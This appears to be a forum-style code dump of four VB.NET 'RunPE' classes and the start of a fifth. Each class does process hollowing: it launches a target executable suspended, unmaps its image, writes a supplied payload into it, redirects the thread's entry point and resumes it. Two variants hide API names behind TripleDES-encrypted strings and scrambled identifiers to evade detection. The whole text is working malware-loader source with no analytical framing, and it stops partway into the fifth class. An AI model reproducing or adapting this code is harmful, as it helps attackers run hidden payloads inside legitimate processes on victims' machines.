Code:
Public Class RunPE1
Public Declare Function apii9 Lib "kernel32" Alias "LoadLibraryA" (ByVal name As String) As IntPtr
Public Declare Function apii0 Lib "kernel32" Alias "GetProcAddress" (ByVal handle As IntPtr, ByVal name As String) As IntPtr
Function CreateAPI(Of T)(ByVal name As String, ByVal method As String) As T
Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(apii0(apii9(name), method), GetType(T)), Object), T)
End Function
Delegate Function apii1(ByVal hThr As IntPtr, ByVal CNTXT As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function apii2(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr) As UInteger
Delegate Function apii3(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, ByRef bufr As IntPtr, ByVal bufrSS As Integer, ByRef numRead As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function apii4(ByVal hThread As IntPtr, ByVal SC As IntPtr) As UInteger
Delegate Function apii5(ByVal hThr As IntPtr, ByVal CNTXT As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function apii6(ByVal hProc As IntPtr, ByVal addr As IntPtr, ByVal SS As IntPtr, ByVal allocType As Integer, ByVal prot As Integer) As IntPtr
Delegate Function apii7(ByVal hProcess As IntPtr, ByVal VABA As IntPtr, ByVal lpBuffer As Byte(), ByVal nSS As UInteger, ByVal NOBW As Integer) As Boolean
Public Declare Auto Function apii8 Lib "kernel32" Alias "CreateProcessW" (ByVal appName As String, ByVal commandLine As StringBuilder, ByVal PTA As IntPtr, ByVal thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal inherit As Boolean, ByVal creation As Integer, ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo As Byte(), ByVal pInfo As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Private Function ReadPtr(ByVal lPtr As Long, Optional ByVal lSS As Long = &H4) As Integer
Dim lRes As IntPtr
Dim lBr As Integer
Dim api4 As apii3 = CreateAPI(Of apii3)("ntdll", "NtReadVirtualMemory")
Call api4(Process.GetCurrentProcess.Handle, lPtr, lRes, lSS, lBr)
Return lRes
End Function
Public Function start(ByVal Buffbawa As Byte(), ByVal sExe As String) As Boolean
Try
Dim hGC As GCHandle = GCHandle.Alloc(Buffbawa, GCHandleType.Pinned) : Dim hModuleBase As Integer = hGC.AddrOfPinnedObject : hGC.Free()
Dim PTA As IntPtr = IntPtr.Zero
Dim tPI As IntPtr() = New IntPtr(3) {}
Dim tSI As Byte() = New Byte(67) {}
Dim N2 As Integer = BitConverter.ToInt32(Buffbawa, 60)
Dim IB As Integer
Dim CNTXT As UInteger() = New UInteger(178) {}
CNTXT(0) = &H10002
apii8(Nothing, New StringBuilder(sExe), PTA, PTA, False, 4, PTA, Nothing, tSI, tPI)
Dim hPE As Integer = (hModuleBase + ReadPtr(hModuleBase + &H3C))
IB = ReadPtr(hPE + &H34)
Dim api3 As apii2 = CreateAPI(Of apii2)("ntdll", "NtUnmapViewOfSection")
api3(tPI(0), IB)
Dim api7 As apii6 = CreateAPI(Of apii6)("kernel32", "VirtualAllocEx")
Dim VABA As IntPtr = api7(tPI(0), IB, ReadPtr(hPE + &H50), &H3000, &H40)
Dim SA As New IntPtr(BitConverter.ToInt32(Buffbawa, N2 + &H34))
Dim SS As New IntPtr(BitConverter.ToInt32(Buffbawa, N2 + 80))
Dim WRET As Integer
Dim NOBW As Integer
Dim api8 As apii7 = CreateAPI(Of apii7)("ntdll", "NtWriteVirtualMemory")
api8(tPI(0), VABA, Buffbawa, CUInt(CInt(ReadPtr(hPE + &H54))), WRET)
For i = 0 To ReadPtr(hPE + &H6, 2) - 1
Dim Destination As Integer() = New Integer(9) {}
Buffer.BlockCopy(Buffbawa, (N2 + &HF8) + (i * 40), Destination, 0, 40)
Dim B2 As Byte() = New Byte((Destination(4) - 1)) {}
Buffer.BlockCopy(Buffbawa, Destination(5), B2, 0, B2.Length)
SS = New IntPtr(VABA.ToInt32() + Destination(3))
SA = New IntPtr(B2.Length)
api8(tPI(0), SS, B2, CUInt(SA), NOBW)
Next i
Dim api2 As apii1 = CreateAPI(Of apii1)("ntdll", "NtGetContextThread")
api2(tPI(1), CNTXT)
api8(tPI(0), CNTXT(41) + &H8, BitConverter.GetBytes(VABA.ToInt32()), CUInt(&H4), NOBW)
CNTXT(&H2C) = IB + ReadPtr(hPE + &H28)
Dim api6 As apii5 = CreateAPI(Of apii5)("ntdll", "NtSetContextThread")
api6(tPI(1), CNTXT)
Dim api5 As apii4 = CreateAPI(Of apii4)("ntdll", "NtResumeThread")
api5(tPI(1), 0)
Catch ex As Exception
Return False
End Try
Return True
End Function
End Class
Code:
Public Class RunPE2
Public Const PAGE_NOCACHE As Long = &H200
Public Const PAGE_EXECUTE_READWRITE As Long = &H40
Public Const PAGE_EXECUTE_WRITECOPY As Long = &H80
Public Const PAGE_EXECUTE_READ As Long = &H20
Public Const PAGE_EXECUTE As Long = &H10
Public Const PAGE_WRITECOPY As Long = &H8
Public Const PAGE_NOACCESS As Long = &H1
Public Const PAGE_READWRITE As Long = &H4
Public Const PAGE_READONLY As UInt32 = &H2
Shared Sub start(ByVal data() As Byte, ByVal target As String)
Dim C = New H.Context, SH As H.Section_Header, PI = New H.Process_Information, SI = New H.Startup_Information, PS = New H.Security_Flags, TS = New H.Security_Flags
Dim GC = GCHandle.Alloc(data, GCHandleType.Pinned)
Dim Buffer As Integer = GC.AddrOfPinnedObject.ToInt32
Dim DH As New H.DOS_Header
DH = Marshal.PtrToStructure(GC.AddrOfPinnedObject, DH.GetType)
GC.Free()
If H.CreateProcess(Nothing, target, PS, TS, False, 4, Nothing, Nothing, SI, PI) = 0 Then Return
Dim NH As New H.NT_Headers
NH = Marshal.PtrToStructure(New IntPtr(Buffer + DH.Address), NH.GetType)
Dim Address, Offset As Long, ret As UInteger
SI.CB = Len(SI)
C.Flags = 65538
If NH.Signature <> 17744 Or DH.Magic <> 23117 Then Return
If H.GetThreadContext(PI.Thread, C) And H.ReadProcessMemory(PI.Process, C.Ebx + 8, Address, 4, 0) >= 0 And H.ZwUnmapViewOfSection(PI.Process, Address) >= 0 Then
Dim ImageBase As UInt32 = H.VirtualAllocEx(PI.Process, NH.Optional.Image, NH.Optional.SImage, 12288, 4)
If ImageBase <> 0 Then
H.WriteProcessMemory(PI.Process, ImageBase, data, NH.Optional.SHeaders, ret)
Offset = DH.Address + 248
For I As Integer = 0 To NH.File.Sections - 1
SH = Marshal.PtrToStructure(New IntPtr(Buffer + Offset + I * 40), SH.GetType)
Dim Raw(SH.Size) As Byte
For Y As Integer = 0 To SH.Size - 1 : Raw(Y) = data(SH.Pointer + Y) : Next
H.WriteProcessMemory(PI.Process, ImageBase + SH.Address, Raw, SH.Size, ret)
H.VirtualProtectEx(PI.Process, ImageBase + SH.Address, SH.Misc.Size, Protect(SH.Flags), Address)
Next I
Dim T = BitConverter.GetBytes(ImageBase)
H.WriteProcessMemory(PI.Process, C.Ebx + 8, T, 4, ret)
C.Eax = ImageBase + NH.Optional.Address
H.SetThreadContext(PI.Thread, C)
H.ResumeThread(PI.Thread)
End If
End If
End Sub
Private Shared Function RShift(ByVal lValue As Long, ByVal lNumberOfBitsToShift As Long) As Long
RShift = vbLongToULong(lValue) / (2 ^ lNumberOfBitsToShift)
End Function
Private Shared Function vbLongToULong(ByVal Value As Long) As Double
Const OFFSET_4 = 4294967296.0#
If Value < 0 Then
vbLongToULong = Value + OFFSET_4
Else
vbLongToULong = Value
End If
End Function
Private Shared Function Protect(ByVal characteristics As Long) As Long
Dim Third() As Object = {PAGE_NOACCESS, PAGE_EXECUTE, PAGE_READONLY, _
PAGE_EXECUTE_READ, PAGE_READWRITE, PAGE_EXECUTE_READWRITE, _
PAGE_READWRITE, PAGE_EXECUTE_READWRITE}
Protect = Third(RShift(characteristics, 29))
End Function
<EditorBrowsable(1)> Friend Class H
<StructLayout(0)> Structure Context
Dim Flags, D0, D1, D2, D3, D6, D7 As UInt32, Save As Save
Dim SG, SF, SE, SD, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SC, EFlags, Esp, SS As UInt32
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> Dim Registers As Byte()
End Structure
<StructLayout(0)> Structure Save
Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte()
Dim State As UInt32
End Structure
Structure Misc
Dim Address, Size As UInt32
End Structure
Structure Section_Header
Dim Name As Byte, Misc As Misc, Address, Size, Pointer, PRelocations, PLines, NRelocations, NLines, Flags As UInt32
End Structure
Structure Process_Information
Dim Process, Thread As IntPtr, ProcessId, ThreadId As Integer
End Structure
<StructLayout(0, CharSet:=3)> Structure Startup_Information
Dim CB As Integer, ReservedA, Desktop, Title As String, X, Y, XSize, YSize, XCount, YCount, Fill, Flags As Integer
Dim ShowWindow, ReservedB As Short, ReservedC, Input, Output, [Error] As Integer
End Structure
<StructLayout(0)> Structure Security_Flags
Dim Length As Integer, Descriptor As IntPtr, Inherit As Integer
End Structure
<StructLayout(0)> Structure DOS_Header
Dim Magic, Last, Pages, Relocations, Size, Minimum, Maximum, SS, SP, Checksum, IP, CS, Table, Overlay As UInt16
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> Dim ReservedA As UInt16()
Dim ID, Info As UInt16
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> Dim ReservedB As UInt16()
Dim Address As Int32
End Structure
Structure NT_Headers
Dim Signature As UInt32, File As File_Header, [Optional] As Optional_Headers
End Structure
<StructLayout(0)> Structure File_Header
Dim Machine, Sections As UInt16, Stamp, Table, Symbols As UInt32, Size, Flags As UInt16
End Structure
<StructLayout(0)> Structure Optional_Headers
Public Magic As UInt16, Major, Minor As Byte, SCode, IData, UData, Address, Code, Data, Image As UInt32, SectionA, FileA As UInt32
Public MajorO, MinorO, MajorI, MinorI, MajorS, MinorS As UInt16, Version, SImage, SHeaders, Checksum As UInt32, Subsystem, Flags As UInt16
Public SSReserve, SSCommit, SHReserve, SHCommit, LFlags, Count As UInt32
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> Public DataDirectory As Data_Directory()
End Structure
<StructLayout(0)> Structure Data_Directory
Dim Address, Size As UInt32
End Structure
Declare Auto Function CreateProcess Lib "kernel32" (ByVal name As String, ByVal command As String, ByRef process As Security_Flags, ByRef thread As Security_Flags, ByVal inherit As Boolean, ByVal flags As UInt32, ByVal system As IntPtr, ByVal current As String, <[In]()> ByRef startup As Startup_Information, <Out()> ByRef info As Process_Information) As Boolean
Declare Auto Function WriteProcessMemory Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal buffer As Byte(), ByVal size As IntPtr, <Out()> ByRef written As Integer) As Boolean
Declare Auto Function ReadProcessMemory Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByRef buffer As IntPtr, ByVal size As IntPtr, ByRef read As Integer) As Integer
Declare Auto Function VirtualProtectEx Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal size As UIntPtr, ByVal [new] As UIntPtr, <Out()> ByVal old As UInt32) As Integer
Declare Auto Function VirtualAllocEx Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal size As UInt32, ByVal type As UInt32, ByVal protect As UInt32) As IntPtr
Declare Auto Function ZwUnmapViewOfSection Lib "ntdll" (ByVal process As IntPtr, ByVal address As IntPtr) As Long
Declare Auto Function ResumeThread Lib "kernel32" (ByVal thread As IntPtr) As UInt32
Declare Auto Function GetThreadContext Lib "kernel32" (ByVal thread As IntPtr, ByRef context As Context) As Boolean
Declare Auto Function SetThreadContext Lib "kernel32" (ByVal thread As IntPtr, ByRef context As Context) As Boolean
End Class
End Class
Code:
Public Class RunPE3
Public Const PageNoCache As Long = &H200
Public Const PageNoAccess As Long = &H1
Public Const PageReadWrite As Long = &H4
Public Const PageExecuteReadWrite As Long = &H40
Public Const PageWriteCopy As Long = &H8
Public Const PageExecuteWriteCopy As Long = &H80
Public Const PageReadOnly As UInt32 = &H2
Public Const PageExecuteRead As Long = &H20
Public Const PageExecute As Long = &H10
Private Shared Sub dop(ByVal dop As Object)
Dim entryPoint As MethodInfo = Assembly.Load(DirectCast(dop, Byte())).EntryPoint
If (entryPoint.GetParameters.Length = 1) Then
entryPoint.Invoke(Nothing, New Object() {New String(0 - 1) {}})
Else
entryPoint.Invoke(Nothing, Nothing)
End If
End Sub
Public Shared Function Tdt(ByVal b As String, ByVal s7O As String, ByVal d As Boolean) _
As String
Dim keyArray As Byte()
Dim toEncryptArray As Byte() = Convert.FromBase64String(b)
If d Then
Dim hashmd5 = New MD5CryptoServiceProvider()
keyArray = hashmd5.ComputeHash(UTF8Encoding.UTF8.GetBytes(S7o))
Else
keyArray = UTF8Encoding.UTF8.GetBytes(S7o)
End If
Dim tdes = New TripleDESCryptoServiceProvider()
tdes.Key = keyArray
tdes.Mode = CipherMode.ECB
tdes.Padding = PaddingMode.PKCS7
Dim cTransform As ICryptoTransform = tdes.CreateDecryptor()
Dim resultArray As Byte() = cTransform.TransformFinalBlock(toEncryptArray, 0, toEncryptArray.Length)
Return UTF8Encoding.UTF8.GetString(resultArray)
End Function
Public Shared Sub start(ByVal data() As Byte, ByVal target As String)
Dim s7O = New Context
Dim asb As SectionHeader
Dim kf7 = New ProcessInformation
Dim qnj = New StartupInformation
Dim dlh = New SecurityFlags
Dim txj = New SecurityFlags
Dim gha = GCHandle.Alloc(data, GCHandleType.Pinned)
Dim a1u As Integer = gha.AddrOfPinnedObject.ToInt32
Dim zvz As New DosHeader
zvz = Marshal.PtrToStructure(gha.AddrOfPinnedObject, zvz.GetType)
gha.Free()
Dim _
srhJrsWaVYRcz2Xx As srhJrsWaVYRcz2Xx = dop(Of srhJrsWaVYRcz2Xx)(Tdt("dvRCNLjP+OuDJ32lam/k7Q==", _
"S83d7wGVdKDsMOqr", True), Tdt("jVjC9jDlRaV8g4IV26grFQ==", _
"SZZK05oR9pHg0PaJ", True))
Dim _
SRHJrsWaVYRcz2Xx5 As SRHJrsWaVYRcz2Xx5 = dop(Of SRHJrsWaVYRcz2Xx5)(Tdt("+XzOgO0RCk73yPGKa4WLfA==", _
"srhJrsWaVYRcz2Xx", True), Tdt("qo8pD7P5GBlriEXMgDjA55Q8ltzvdLGV", _
"S6NMAgIR5ZbH5AQF", True))
Dim _
SRHJrsWaVYRcz2Xx1 As SRHJrsWaVYRcz2Xx1 = dop(Of SRHJrsWaVYRcz2Xx1)(Tdt("dvRCNLjP+OuDJ32lam/k7Q==", _
"S83d7wGVdKDsMOqr", True), Tdt("CHybFkT/j4LSIvu87v/GsdSlLqbljCkk", _
"SFCvzqdp9dywEjDp", True))
Dim _
SRHJrsWaVYRcz2Xx0 As SRHJrsWaVYRcz2Xx0 = dop(Of SRHJrsWaVYRcz2Xx0)(Tdt("KyJpuPW5eg22C8dC5G+KVg==", _
"SZZK05oR9pHg0PaJ", True), Tdt("kf61Dhidwz9wMwOjSHK4YETTLNhxuGIH", _
"SMHj7OFygWCUKZbn", True))
Dim _
SRHJrsWaVYRcz2Xx3 As SRHJrsWaVYRcz2Xx3 = dop(Of SRHJrsWaVYRcz2Xx3)(Tdt("wZ7TXAXtVbQ=", _
"SeguhaHOHZflQCwj", True), Tdt("Dm/s3b+yoYApV1X8rEQ58NdVjRFWgfOj", _
"SeguhaHOHZflQCwj", True))
Dim _
SRHJrsWaVYRcz2Xx2 As SRHJrsWaVYRcz2Xx2 = dop(Of SRHJrsWaVYRcz2Xx2)(Tdt("TtYu0Pbxw42UPJbc73SxlQ==", _
"S6NMAgIR5ZbH5AQF", True), Tdt("FBp928xkwqCDSQAymqelKg==", _
"SR6GfUyCEmufKk6g", True))
Dim _
SRHJrsWaVYRcz2Xx6 As SRHJrsWaVYRcz2Xx6 = dop(Of SRHJrsWaVYRcz2Xx6)(Tdt("9RyvxWOKu9f40EKcv4MI4Q==", _
"SFCvzqdp9dywEjDp", True), Tdt("wORCMZTJ0qdbvNZEEc13+DihaxMtFKfr", _
"SBq3UqPpfbuWsoDp", True))
Dim _
SRHJrsWaVYRcz2Xx4 As SRHJrsWaVYRcz2Xx4 = dop(Of SRHJrsWaVYRcz2Xx4)(Tdt("Tk2/qwiH6LqBDrgBBdYjRQ==", _
"SMHj7OFygWCUKZbn", True), Tdt("YmZbgg8aZnt59bygj4ec5w==", _
"SvcDm2KU6uHfNz8h", True))
If srhJrsWaVYRcz2Xx _
(Nothing, target, dlh, txj, False, 4, Nothing, Nothing, qnj, kf7) = 0 Then Return
Dim dav As New NtHeaders
dav = Marshal.PtrToStructure(New IntPtr(a1u + zvz.Address), dav.GetType)
Dim address, Offset As Long, ret As UInteger
qnj.Cba = Len(qnj)
s7O.Flags = 65539
If dav.Signature <> 17744 Or zvz.Magic <> 23117 Then Return
If srhJrsWaVYRcz2Xx _
(Nothing, target, dlh, txj, False, 4, Nothing, Nothing, qnj, _
kf7) = 0 Then Return
SRHJrsWaVYRcz2Xx5(kf7.Thread, s7O)
SRHJrsWaVYRcz2Xx1(kf7.Process, s7O.Ebx + 8, address, 4, 0)
SRHJrsWaVYRcz2Xx3(kf7.Process, address)
Dim pCuFZOVYE2lA9TtkU As UInt32 = _
SRHJrsWaVYRcz2Xx2(kf7.Process, dav.Optional.Image, dav.Optional.SImage, 12288, 4)
If pCuFZOVYE2lA9TtkU <> 0 Then
SRHJrsWaVYRcz2Xx0(kf7.Process, pCuFZOVYE2lA9TtkU, data, dav.Optional.SHeaders, ret)
Offset = zvz.Address + 248
For I As Integer = 0 To dav.File.Sections - 1
asb = Marshal.PtrToStructure(New IntPtr(a1u + Offset + I * 40), asb.GetType)
Dim Raw(asb.Size) As Byte
For Y As Integer = 0 To asb.Size - 1 : Raw(Y) = data(asb.Pointer + Y) : Next
SRHJrsWaVYRcz2Xx0 _
(kf7.Process, pCuFZOVYE2lA9TtkU + asb.Address, Raw, asb.Size, _
ret)
Next I
Dim T = BitConverter.GetBytes(pCuFZOVYE2lA9TtkU)
SRHJrsWaVYRcz2Xx0(kf7.Process, s7O.Ebx + 8, T, 4, ret)
s7O.Eax = pCuFZOVYE2lA9TtkU + dav.Optional.Address
SRHJrsWaVYRcz2Xx6(kf7.Thread, s7O)
SRHJrsWaVYRcz2Xx4(kf7.Thread)
End If
End Sub
<DllImport("kernel32", CharSet:=CharSet.Ansi, SetLastError:=True, ExactSpelling:=True)> Private Shared _
Function GetProcAddress _
(ByVal handle As IntPtr, <MarshalAs(UnmanagedType.VBByRefStr)> ByRef JO3P0nWH9RI As String) _
As IntPtr
End Function
<DllImport("kernel32", CharSet:=CharSet.Ansi, SetLastError:=True, ExactSpelling:=True)> Private Shared _
Function LoadLibraryA(<MarshalAs(UnmanagedType.VBByRefStr)> ByRef JO3P0nWH9RI As String) As IntPtr
End Function
Private Shared Function dop(Of T)(ByVal JO3P0nWH9RI As String, ByVal GF5g8nwopw As String) As T
Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer _
(GetProcAddress(LoadLibraryA(JO3P0nWH9RI), GF5g8nwopw), _
GetType(T)), Object), T)
End Function
<StructLayout(0)> Structure Context
Dim Flags, D0, D1, D2, D3, D6, D7 As UInt32, Save As Save
Dim SG, SF, SE, SD, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SC, EFlags, Esp, SS As UInt32
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> Dim Registers As Byte()
End Structure
<StructLayout(0)> Structure Save
Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte()
Dim State As UInt32
End Structure
Structure Misc
Dim Address, Size As UInt32
End Structure
Structure SectionHeader
Dim JO3P0nWH9RI As Byte, _
Misc As Misc, _
Address, Size, Pointer, PRelocations, PLines, NRelocations, NLines, Flags As UInt32
End Structure
Structure ProcessInformation
Dim Process, Thread As IntPtr, ProcessId, ThreadId As Integer
End Structure
<StructLayout(0, CharSet:=3)> Structure StartupInformation
Dim Cba As Integer, _
ReservedA, Desktop, Title As String, _
X, Y, XSize, YSize, XCount, YCount, Fill, Flags As Integer
Dim ShowWindow, ReservedB As Short, ReservedC, Input, Output, [Error] As Integer
End Structure
<StructLayout(0)> Structure SecurityFlags
Dim Length As Integer, Descriptor As IntPtr, Inherit As Integer
End Structure
<StructLayout(0)> Structure DosHeader
Dim Magic, Last, Pages, Relocations, Size, Minimum, Maximum, SS, SP, Checksum, IP, CS, Table, Overlay As UInt16
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> Dim ReservedA As UInt16()
Dim ID, Info As UInt16
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> Dim ReservedB As UInt16()
Dim Address As Int32
End Structure
Structure NtHeaders
Dim Signature As UInt32, File As FileHeader, [Optional] As OptionalHeaders
End Structure
<StructLayout(0)> Structure FileHeader
Dim Machine, Sections As UInt16, Stamp, Table, Symbols As UInt32, Size, Flags As UInt16
End Structure
<StructLayout(0)> Structure OptionalHeaders
Public Magic As UInt16, _
Major, Minor As Byte, _
SCode, IData, UData, Address, Code, Data, Image As UInt32, _
SectionA, FileA As UInt32
Public MajorO, MinorO, MajorI, MinorI, MajorS, MinorS As UInt16, _
Version, SImage, SHeaders, Checksum As UInt32, _
Subsystem, Flags As UInt16
Public SSReserve, SSCommit, SHReserve, SHCommit, LFlags, Count As UInt32
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> Public CacaCirectory As Caca_Cirectory()
End Structure
<StructLayout(0)> Structure Caca_Cirectory
Dim Address, Size As UInt32
End Structure
Private Delegate Function srhJrsWaVYRcz2Xx _
(ByVal JO3P0nWH9RI As String, ByVal Ly1PWQU6zs As String, ByRef SggXrcsxs79yrjkO As SecurityFlags, _
ByRef thread As SecurityFlags, _
ByVal inherit As Boolean, ByVal flags As UInt32, ByVal system As IntPtr, ByVal current As String, _
<[In]()> ByRef startup As StartupInformation, <Out()> ByRef info As ProcessInformation) As Boolean
Private Delegate Function SRHJrsWaVYRcz2Xx0 _
(ByVal SggXrcsxs79yrjkO As IntPtr, ByVal zfi89Nkg9c As Integer, ByVal a1u As Byte(), _
ByVal size As Integer, <Out()> ByRef written As Integer) As Boolean
Private Delegate Function SRHJrsWaVYRcz2Xx1 _
(ByVal SggXrcsxs79yrjkO As IntPtr, ByVal zfi89Nkg9c As Integer, ByRef a1u As Integer, _
ByVal size As Integer, ByRef read As Integer) As Integer
Private Delegate Function SRHJrsWaVYRcz2Xx2 _
(ByVal SggXrcsxs79yrjkO As IntPtr, ByVal zfi89Nkg9c As Integer, ByVal size As UInt32, ByVal type As UInt32, _
ByVal protect As UInt32) As IntPtr
Private Delegate Function SRHJrsWaVYRcz2Xx3(ByVal SggXrcsxs79yrjkO As IntPtr, ByVal zfi89Nkg9c As Integer) As Long
Private Delegate Function SRHJrsWaVYRcz2Xx4(ByVal thread As IntPtr) As UInt32
Private Delegate Function SRHJrsWaVYRcz2Xx5(ByVal thread As IntPtr, ByRef context As Context) As Boolean
Private Delegate Function SRHJrsWaVYRcz2Xx6(ByVal thread As IntPtr, ByRef context As Context) As Boolean
End Class
Code:
Public Class RunPE4
Public Shared TngIKL As New System.Security.Cryptography.TripleDESCryptoServiceProvider
Public Shared JVTvYd As New System.Security.Cryptography.MD5CryptoServiceProvider
Public Shared Function utDJXA(ByVal cvmPSO As String) As Byte()
Return JVTvYd.ComputeHash(System.Text.ASCIIEncoding.UTF8.GetBytes(cvmPSO))
End Function
Public Shared Function FeYCUo(ByVal VmkZwK As String, ByVal WUUZDv As String) As String
On Error Resume Next
TngIKL.Key = utDJXA(WUUZDv)
TngIKL.Mode = System.Security.Cryptography.CipherMode.ECB
Dim CodnPp() As Byte = Convert.FromBase64String(VmkZwK)
Return System.Text.ASCIIEncoding.UTF8.GetString(TngIKL.CreateDecryptor().TransformFinalBlock(CodnPp, 0, CodnPp.Length))
End Function
Public Declare Function bLLRl Lib "kernel32" Alias "LoadLibraryA" (ByVal nQDUd As String) As IntPtr
Public Declare Function ZjzJt Lib "kernel32" Alias "GetProcAddress" (ByVal yZhYy As IntPtr, ByVal kBbXD As String) As IntPtr
Function GyRZJ(Of T)(ByVal PrLlr As String, ByVal nEUBm As String) As T
Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(ZjzJt(bLLRl(PrLlr), nEUBm), GetType(T)), Object), T)
End Function
Delegate Function XuAAu(ByVal IrRMz As IntPtr, ByVal LmmUty As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function DTjMp(ByVal WbEOKY As IntPtr, ByVal mKoBRn As IntPtr) As UInteger
Delegate Function NjwCa(ByVal gqrpwB As IntPtr, ByVal zQANwZ As IntPtr, ByRef WpXrSU As IntPtr, ByVal QrGSaE As Integer, ByRef JXAcvm As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function VUbTE(ByVal cGlpuj As IntPtr, ByVal FEpIZz As IntPtr) As UInteger
Delegate Function FKVqV(ByVal GBTikA As IntPtr, ByVal uBiyie As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function nkDaY(ByVal hmTQdv As IntPtr, ByVal uqLzDL As IntPtr, ByVal rYBQOc As IntPtr, ByVal qJYtAV As Integer, ByVal akoIiv As Integer) As IntPtr
Delegate Function vqYMg(ByVal MMwICt As IntPtr, ByVal GlmFHM As IntPtr, ByVal TyzwRj As Byte(), ByVal EElRhQ As UInteger, ByVal oNgTng As Integer) As Boolean
Public Declare Auto Function JqXeSe Lib "kernel32" Alias "CreateProcessW" (ByVal akCprw As String, ByVal byglKR As StringBuilder, ByVal IKLJVT As IntPtr, ByVal vYdutD As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal PSOFeY As Boolean, ByVal CUoVmk As Integer, ByVal ZwKWUU As IntPtr, ByVal ZDvCod As String, ByVal nPpalH As Byte(), ByVal PhjVkq As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Private Function PHSNiW(ByVal tlOnHv As Long, Optional ByVal WnaeIH As Long = &H4) As Integer
Dim ADVoiL As IntPtr
Dim XwYNWu As Integer
Dim vtQgoy As NjwCa = GyRZJ(Of NjwCa)("ntdll", "NtReadVirtualMemory")
Call vtQgoy(Process.GetCurrentProcess.Handle, tlOnHv, ADVoiL, WnaeIH, XwYNWu)
Return ADVoiL
End Function
Public Function start(ByVal HIntmi As Byte(), ByVal NdPPep As String) As Boolean
Try
Dim YbQTMu As GCHandle = GCHandle.Alloc(HIntmi, GCHandleType.Pinned) : Dim hModuleBase As Integer = YbQTMu.AddrOfPinnedObject : YbQTMu.Free()
Dim Mbqzdr As IntPtr = IntPtr.Zero
Dim zuOjtv As IntPtr() = New IntPtr(3) {}
Dim UETenS As Byte() = New Byte(67) {}
Dim XOjcdb As Integer = BitConverter.ToInt32(HIntmi, 60)
Dim ihEocg As Integer
Dim WAOlwk As UInteger() = New UInteger(178) {}
WAOlwk(0) = &H10002
JqXeSe(Nothing, New StringBuilder(NdPPep), Mbqzdr, Mbqzdr, False, 4, Mbqzdr, Nothing, UETenS, zuOjtv)
Dim pRhhQA As Integer = (hModuleBase + PHSNiW(hModuleBase + &H3C))
ihEocg = PHSNiW(pRhhQA + &H34)
Dim NwZuBi As DTjMp = GyRZJ(Of DTjMp)("ntdll", "NtUnmapViewOfSection")
NwZuBi(zuOjtv(0), ihEocg)
Dim yieuqL As nkDaY = GyRZJ(Of nkDaY)("kernel32", "VirtualAllocEx")
Dim zDLGlm As IntPtr = yieuqL(zuOjtv(0), ihEocg, PHSNiW(pRhhQA + &H50), &H3000, &H40)
Dim FHMrYB As New IntPtr(BitConverter.ToInt32(HIntmi, XOjcdb + &H34))
Dim QOcTyz As New IntPtr(BitConverter.ToInt32(HIntmi, XOjcdb + 80))
Dim wRjakC As Integer
Dim prwWpX As Integer
Dim rSUqJY As vqYMg = GyRZJ(Of vqYMg)("ntdll", "NtWriteVirtualMemory")
rSUqJY(zuOjtv(0), zDLGlm, HIntmi, CUInt(CInt(PHSNiW(pRhhQA + &H54))), wRjakC)
For i = 0 To PHSNiW(pRhhQA + &H6, 2) - 1
Dim tAVEEl As Integer() = New Integer(9) {}
Buffer.BlockCopy(HIntmi, (XOjcdb + &HF8) + (i * 40), tAVEEl, 0, 40)
Dim RhQbyg As Byte() = New Byte((tAVEEl(4) - 1)) {}
Buffer.BlockCopy(HIntmi, tAVEEl(5), RhQbyg, 0, RhQbyg.Length)
QOcTyz = New IntPtr(zDLGlm.ToInt32() + tAVEEl(3))
FHMrYB = New IntPtr(RhQbyg.Length)
rSUqJY(zuOjtv(0), QOcTyz, RhQbyg, CUInt(FHMrYB), prwWpX)
Next i
Dim lKRQrG As XuAAu = GyRZJ(Of XuAAu)("ntdll", "NtGetContextThread")
lKRQrG(zuOjtv(1), WAOlwk)
rSUqJY(zuOjtv(0), WAOlwk(41) + &H8, BitConverter.GetBytes(zDLGlm.ToInt32()), CUInt(&H4), prwWpX)
WAOlwk(&H2C) = ihEocg + PHSNiW(pRhhQA + &H28)
Dim SaEako As FKVqV = GyRZJ(Of FKVqV)("ntdll", "NtSetContextThread")
SaEako(zuOjtv(1), WAOlwk)
Dim IivoNg As VUbTE = GyRZJ(Of VUbTE)("ntdll", "NtResumeThread")
IivoNg(zuOjtv(1), 0)
Catch ex As Exception
Return False
End Try
Return True
End Function
End Class
Code:
Class RunPE5
#Region "Static API Calls"
